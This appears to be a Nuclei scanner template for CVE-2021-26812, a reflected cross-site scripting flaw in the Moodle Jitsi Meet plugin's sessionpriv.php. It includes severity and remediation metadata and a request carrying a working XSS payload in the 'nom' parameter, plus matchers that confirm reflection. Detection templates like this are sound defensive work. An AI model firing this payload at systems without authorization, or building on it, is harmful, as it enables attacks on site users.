id: CVE-2021-26812

info:
  name: Moodle Jitsi Meet 2.7-2.8.3 - Cross-Site Scripting
  author: aceseven (digisec360)
  severity: medium
  description: Moodle Jitsi Meet 2.7 through 2.8.3 plugin contains a cross-site scripting vulnerability via the "sessionpriv.php" module. This allows attackers to craft a malicious URL, which when clicked on by users, can inject JavaScript code to be run by the application.
  remediation: |
    Update to the latest version of the Moodle Jitsi Meet plugin to mitigate the XSS vulnerability.
  reference:
    - https://github.com/udima-university/moodle-mod_jitsi/issues/67
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26812
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-26812
    cwe-id: CWE-79
    epss-score: 0.00633
    epss-percentile: 0.76724
    cpe: cpe:2.3:a:jitsi:meet:*:*:*:*:*:moodle:*:*
  metadata:
    max-request: 1
    vendor: jitsi
    product: meet
    framework: moodle
  tags: cve,cve2021,moodle,jitsi,xss,plugin

http:
  - method: GET
    path:
      - "{{BaseURL}}/mod/jitsi/sessionpriv.php?avatar=https%3A%2F%2F{{Hostname}}%2Fuser%2Fpix.php%2F498%2Ff1.jpg&nom=test_user%27)%3balert(document.domain)%3b//&ses=test_user&t=1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "alert(document.domain);"

      - type: word
        part: header
        words:
          - "MoodleSession"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100b1aa7780a576815f4d27a90330b0e61f918073cb7120882b0f9d9db68745b4ce022100dbda586f49377b9b7621430ad296bfe9e5105e6abb780835597b1ea66c337e84:922c64590222798bb761d5b6d8e72950